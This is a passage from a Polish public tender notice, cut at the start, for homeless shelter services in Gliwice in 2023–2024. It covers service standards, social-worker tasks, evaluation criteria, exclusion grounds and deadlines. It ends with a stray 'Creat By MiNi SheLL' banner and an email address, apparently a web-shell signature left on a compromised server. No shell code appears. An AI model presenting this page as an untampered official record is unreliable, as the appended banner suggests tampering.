Rozporządzenia Ministra Rodziny, Pracy i Polityki Społecznej z dnia 27 kwietnia 2018 r. w sprawie minimalnych standardów noclegowni, schronisk dla osób bezdomnych, schronisk dla osób bezdomnych z usługami opiekuńczymi i ogrzewalni (Dz.U. z 2018 poz. 896) tymczasowego schronienia w schronisku osobom bezdomnym - mężczyznom kierowanym przez Ośrodek Pomocy Społecznej w Gliwicach w okresie od 01.05.2023r. do 30.04.2024r. w maksymalnej liczbie 28872 osobodni.<br/>1.	Minimalna liczba osobodni wynosi 22800. Liczba osobodni uzależniona będzie od potrzeb Zamawiającego. <br/>2.	Zamawiający będzie dokonywał zapłaty za faktyczną ilość osobodni świadczonych przez schronisko dla osób bezdomnych nie mniej niż 22800 osobodni. Wykonawcy nie przysługuje roszczenie finansowe z tytułu niewykorzystania maksymalnej liczby osobodni. <br/>3.	Placówka powinna spełniać wymagania sanitarno – epidemiologiczne, przeciwpożarowe oraz inne do prowadzenia wskazanej działalności.<br/>1)	Dla podmiotów, które w dniu wejścia w życie przepisów art. 48a ustawy z 12 marca 2004r. o pomocy społecznej nie prowadziły schroniska dla osób bezdomnych szczegółowy zakres i standard usług świadczonych w ramach pobytu w placówce, standard obiektu oraz kwalifikacje osób świadczących usługi w schronisku powinny być zgodne z Rozporządzeniem Ministra Rodziny, Pracy i Polityki Społecznej z dnia 27 kwietnia 2018 r. w sprawie minimalnych standardów noclegowni, schronisk dla osób bezdomnych, schronisk dla osób bezdomnych z usługami opiekuńczymi i ogrzewalni (Dz.U. z 2018 poz. 896) oraz z art. 48a ustawy z 12 marca 2004r. o pomocy społecznej (tj. Dz.U. z 2021 poz. 2268 z późn. zm.)<br/>2)	Dla podmiotów, które w dniu wejścia w życie przepisów art. 48a ustawy z 12 marca 2004r. o pomocy społecznej prowadziły schronisko dla osób bezdomnych szczegółowy zakres usług świadczonych w ramach pobytu w placówce to:<br/>a)	możliwość całodobowego przebywania w schronisku,<br/>b)	miejsce noclegowe w pokoju wieloosobowym (nie więcej niż 10 osób w jednym pomieszczeniu), w którym temperatura nie jest niższa niż 20°C. <br/>c)	swobodny dostęp do łóżek wyposażonych w materac i komplet pościeli (tj. poduszkę, koc, prześcieradło i pokrycie na koc) oraz dostęp do szafy,<br/>d)	dostęp do pomieszczenia kuchennego umożliwiającego samodzielne przygotowanie posiłku i gorącego napoju oraz jego spożycia, wyposażone w co najmniej jedną kuchenkę i lodówkę oraz szafki kuchenne<br/>e)	dostęp do toalety, prysznica z dostępem do bieżącej ciepłej i zimnej wody w tym jednej toalety i łazienki pozbawionych barier architektonicznych <br/>f)	możliwość prania i suszenia odzieży a w przypadku braku możliwości jej wymiany – dezynfekcję i dezynsekcję,<br/>g)	informację o dostępnych formach pomocy, a w razie potrzeby pomoc w jej zorganizowaniu, <br/>h)	zapewnienie usług aktywizacyjnych ukierunkowanych na wzmacnianie aktywności społecznej, uzyskanie samodzielności życiowej i wyjście z bezdomności,<br/>i)	zapewnienie opieki przez opiekunów posiadających wykształcenie zasadnicze branżowe lub zasadnicze zawodowe, co najmniej roczne doświadczenie w pracy z osobami bezdomnymi oraz ukończone szkolenie z zakresu udzielania pierwszej pomocy lub wykształcenie co najmniej średnie lub średnie branżowe oraz ukończone szkolenie z zakresu udzielania pierwszej pomocy (co najmniej 1 opiekun na nie więcej niż 50 osób przebywających w schronisku, w porze nocnej powinna być w schronisku zapewniona opieka przez co najmniej 1 opiekuna). Nie dopuszcza się do bezpośredniej realizacji przedmiotu zamówienia na stanowisku opiekuna osób korzystających z ww. usługi. W przypadku zatrudnienia na innych stanowiskach wymaganą formą zatrudnienia jest umowa o pracę w minimalnym wymiarze czasu pracy odpowiadającym ½ etatu.<br/>j)	zatrudnienie w schronisku pracownika socjalnego i ścisła współpraca z pracownikami socjalnymi OPS Gliwice.<br/>k)	Wykonawca do dnia wskazanego w art. 4 ustawy z dnia 08.02.2018 r. o zmianie ustawy o pomocy społecznej zobowiązuje się zatrudniać pracownika socjalnego w wymiarze co najmniej 3 dni roboczych w godzinach zgodnych z godzinami pracy Ośrodka Pomocy Społecznej.<br/>l)	Wykonawca zobowiązuje się przekazywać Zamawiającemu harmonogram pracy pracownika socjalnego na każdy miesiąc do ostatniego dnia miesiąca poprzedzającego.<br/>3)	Podmioty, które w dniu wejścia w życie przepisów art. 48a ustawy z 12 marca 2004r. o pomocy społecznej prowadziły schronisko dla osób bezdomnych powinny do dnia wskazanego w art. 4 ustawy z dnia 08.02.2018 r. o zmianie ustawy o pomocy społecznej dostosować szczegółowy zakres i standard usług świadczonych w ramach pobytu w placówce, standard obiektu oraz kwalifikacje osób świadczących usługi w schronisku do Rozporządzenia Ministra Rodziny, Pracy i Polityki Społecznej z dnia 27 kwietnia 2018 r. w sprawie minimalnych standardów noclegowni, schronisk dla osób bezdomnych, schronisk dla osób bezdomnych z usługami opiekuńczymi i ogrzewalni (Dz.U. z 2018 poz. 896) oraz z art. 48a ustawy z 12 marca 2004r. o pomocy społecznej (tj. Dz.U. z 2021 poz. 2268 z późn. zm.)<br/><br/>4.	Inne wymagania do spełnienia przez podmioty niż wymienione w pkt 3:<br/>1)	Wykonawca wyznacza osobę/osoby do kontaktu z Zamawiającym oraz zapewnia możliwość całodobowego kontaktu telefonicznego z personelem placówki. Do realizacji umowy niezbędne jest posiadanie profilu zaufanego i kontakt z Zamawiającym przez ePUAP <br/>2)	podstawą do realizacji usługi przez Wykonawcę, będzie imienna lista osób uprawnionych do korzystania ze schronienia, przekazywana 2 dni robocze przed rozpoczęciem miesiąca, na który przyznano schronienie. Lista przekazywana będzie za pośrednictwem elektronicznej skrzynki podawczej ePUAP lub zakodowanego emaila. W przypadku przyznania schronienia w trakcie miesiąca Zamawiający będzie dokonywał zgłoszenia w formie elektronicznej,<br/>3)	Wykonawca zapewnia przyjęcie osoby bezdomnej do schroniska w dni robocze w godz. 8:00-19:00,<br/>4)	w sytuacjach wyjątkowych np. warunków atmosferycznych zagrażających zdrowiu i życiu, na zlecenie telefoniczne otrzymane od wyznaczonego pracownika Ośrodka, Wykonawca zapewnia przyjęcie osoby bezdomnej do placówki, codziennie przez całą dobę. Pisemne zlecenie zostanie przekazane przez Zamawiającego za pośrednictwem platformy ePUAP lub zakodowanego e-maila pierwszego dnia roboczego następującego po zgłoszeniu telefonicznym,<br/>5)	w sytuacji wyjątkowej w przypadku placówki znajdującej się poza miastem Gliwice, Wykonawca zapewnia dowóz osoby bezdomnej do placówki własnym transportem, na własny koszt,<br/>6)	sporządzenie przez Wykonawcę regulaminu placówki, określającego zasady współżycia i gwarantującego wszystkim skierowanym osobom bezpieczny pobyt z poszanowaniem godności i prawa do samostanowienia oraz przeciwdziałający praktykom niehumanitarnym i dyskryminującym ze strony personelu i współmieszkańców, <br/>7)	przedstawienie Zamawiającemu do zaakceptowania regulaminu placówki w dniu podpisania umowy oraz konsultowanie i uzgadnianie wszelkich wprowadzonych zmian w regulaminie,<br/>8)	zapoznanie wszystkich osób przyjmowanych do placówki z regulaminem, uzyskanie od klientów pisemnego oświadczenia o zapoznaniu się z regulaminem i zobowiązaniem do jego przestrzegania,<br/>9)	informowanie Zamawiającego w tym samym lub następnym dniu roboczym o każdym przypadku usunięcia osoby z placówki z powodu nieprzestrzegania regulaminu lub dobrowolnego opuszczenia placówki przez osobę skierowaną, pobieranie od niej oświadczenia o miejscu pobytu lub adresu do korespondencji oraz opisane okoliczności i powodów opuszczenia placówki przez osobę skierowaną,<br/>10)	współpraca na rzecz osób bezdomnych z Ośrodkiem Pomocy Społecznej w Gliwicach oraz innymi instytucjami i organizacjami pozarządowymi,<br/>11)	prowadzenie dokumentacji dotyczącej przebywających w placówce osób umożliwiającą ich identyfikację oraz dokumentację działalności placówki w postaci list obecności mieszkańców oraz indywidualnej dokumentacji mieszkańca zawierającej w szczególności: oświadczenie o zapoznaniu się z regulaminem placówki i deklaracją jego przestrzegania, opis podejmowanych działań z klientem i na rzecz klienta i wszystkie inne istotne informacje dot. sytuacji klienta mające znaczenie i wpływ na uzyskanie samodzielności życiowej,<br/>12)	zadania pracownika socjalnego mającego świadczyć wsparcie na terenie schroniska dla bezdomnych: <br/>a)	prowadzenie indywidualnej kartoteki, <br/>b)	przekazywanie raz na 2 m-ce Zamawiającemu sprawozdania o realizacji zobowiązań, <br/>c)	w razie potrzeby zgłaszanie do POZ, monitoring ewentualnego procesu leczenia, pomoc w wykupie leków, <br/>d)	pomoc przy załatwianiu orzeczenia o niepełnosprawności, prawa do renty/emerytury, <br/>e)	monitoring poszukiwania pracy, trening dbałości o higienę osobistą, czystość odzieży i wizerunek, <br/>f)	monitoring leczenia uzależnień (uczestnictwo w grupach wsparcia), <br/>g)	monitoring uzyskania mieszkania, <br/>h)	wsparcie w spłacie zadłużenia, <br/>i)	zgłaszanie wszystkich sytuacji nieprzestrzegania regulaminu w szczególności zgłoszenia się w stanie nietrzeźwości, <br/>j)	wsparcie w podtrzymywaniu kontaktów z rodziną.<br/>13)	umożliwienie Zamawiającemu przeprowadzenie kontroli w placówce i udostępnienie wszystkich dokumentów żądanych przez osoby kontrolujące, <br/>14)	wyposażenie placówki w apteczkę pierwszej pomocy medycznej spełniającą normę DIN 13157<br/>15)	przez cały okres trwania umowy Wykonawca musi być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż 50 000,00 zł (słownie: pięćdziesiąt tysięcy zł)<br/><br/>Szczegółowy opis przedmiotu zamówienia W CAŁOŚCI znajduje się w SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311000-2 - Usługi opieki społecznej obejmujące miejsca noclegowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-05-01 do 2024-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane w odniesieniu do najkorzystniejszych warunków przedstawionych przez wykonawców w zakresie kryteriów oceny.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">dogodna lokalizacja schroniska – najmniejsza odległość schroniska od Ośrodka Pomocy Społecznej w Gliwicach, ul. Górnych Wałów 9 – trasa ustalana na podstawie najkrótszej odległości po drogach, liczonej w kilometrach (należy dołączyć wydruk z mapy Google) – w przypadku gdy schronisko posiada więcej niż jedną placówkę, najmniejszą odległość Schroniska od OPS oblicza się na podstawie najkrótszej odległości po drogach, liczonej w kilometrach od placówki mieszczącej się w dalszej odległości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Zdolność do występowania w obrocie gospodarczym<br/>Określenie warunku:<br/>Zamawiający nie określa szczegółowego warunku w tym zakresie.<br/><br/>2. Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>Określenie warunku:<br/>Zamawiający nie określa szczegółowego warunku w tym zakresie.<br/><br/>3. Sytuacja finansowa lub ekonomiczna<br/>Określenie warunku:<br/>O zamówienie mogą ubiegać się wykonawcy, których sytuacja ekonomiczna i finansowa pozwoli na prawidłowe wykonanie zamówienia, Wykonawca jest zobowiązany do posiadania przez cały okres trwania umowy ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejsza niż 50 000,00 zł.<br/><br/>4. Zdolność techniczna lub zawodowa<br/>Określenie warunku:<br/>O zamówienie mogą ubiegać się wykonawcy, którzy posiadają wiedzę i doświadczenie pozwalające na prawidłowe wykonanie zamówienia.<br/>O zamówienie mogą ubiegać się wykonawcy, którzy posiadają potencjał techniczny pozwalający na prawidłowe wykonanie zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">DOKUMENTY SKŁADANE WRAZ Z OFERTĄ:<br/>- oświadczenie o niepodleganiu wykluczeniu oraz spełnieniu warunków udziału w postępowaniu o treści ZAŁĄCZNIKA NR 2 do SWZ, Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa powyżej, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu lub kryteriów selekcji, w zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/>W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie składa każdy z wykonawców wspólnie ubiegających się o zamówienie (np. konsorcjum, wspólnicy spółki cywilnej). Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu lub kryteriów selekcji oraz brak podstaw wykluczenia w zakresie, w którym każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu lub kryteriów selekcji oraz brak podstaw wykluczenia.<br/><br/>- zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, ze wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu lub kryteriów selekcji, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części,<br/>polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych. Zobowiązanie podmiotu udostępniającego zasoby, potwierdza, ze stosunek łączący wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów. Przykładowy wzór zobowiązania podmiotu udostępniającego zasoby stanowi ZAŁĄCZNIK NR 8 do SWZ.<br/><br/><br/>DOKUMENTY SKŁADANE NA WEZWANIE ZAMAWIAJĄCEGO:<br/>- odpis lub informacja z Krajowego Rejestru Sadowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzona nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast powyższego dokumentu składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, ze nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sad, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury, wystawione nie wcześniej niż 3 miesiące przed ich złożeniem,<br/><br/>- oświadczenie wykonawcy, w zakresie art. 108 ust 1 pkt 5 ustawy pzp, o braku przynależności do tej samej grupy kapitałowej o treści ZAŁĄCZNIKA NR 5 do SWZ w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym wykonawca, który złożył odrębną ofertę, ofertę częściowa lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej<br/><br/>- oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy pzp o treści ZAŁĄCZNIKA NR 3 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">DOKUMENTY SKŁADANE WRAZ Z OFERTĄ:<br/>- oświadczenie o niepodleganiu wykluczeniu oraz spełnieniu warunków udziału w postępowaniu o treści ZAŁĄCZNIKA NR 2 do SWZ, Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa powyżej, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu lub kryteriów selekcji, w zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/>W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie składa każdy z wykonawców wspólnie ubiegających się o zamówienie (np. konsorcjum, wspólnicy spółki cywilnej). Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu lub kryteriów selekcji oraz brak podstaw wykluczenia w zakresie, w którym każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu lub kryteriów selekcji oraz brak podstaw wykluczenia.<br/><br/>- zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, ze wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu lub kryteriów selekcji, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych. Zobowiązanie podmiotu udostępniającego zasoby, potwierdza, ze stosunek łączący wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów. Przykładowy wzór zobowiązania podmiotu udostępniającego zasoby stanowi ZAŁĄCZNIK NR 8 do SWZ.<br/><br/>DOKUMENTY SKŁADANE NA WEZWANIE ZAMAWIAJĄCEGO:<br/>-dokumenty potwierdzające, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną tego ubezpieczenia określoną przez zamawiającego.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. W takim przypadku wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do wniosku o dopuszczenie do udziału w postępowaniu albo do oferty oświadczenie, z którego wynika, które roboty budowlane lub usługi wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany umowy wymagają formy pisemnej pod rygorem nieważności i będą dopuszczalne w granicach unormowania art. 455 ustawy Prawo zamówień publicznych. Dopuszczalne są również zmiany wynagrodzenia wynikające ze zmian klauzul waloryzacyjnych.<br/>Warunki dot. zmiany umowy opisane są w załączniku nr 6 do SWZ- Wzór umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-03-07 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-03-07 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-04-05</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com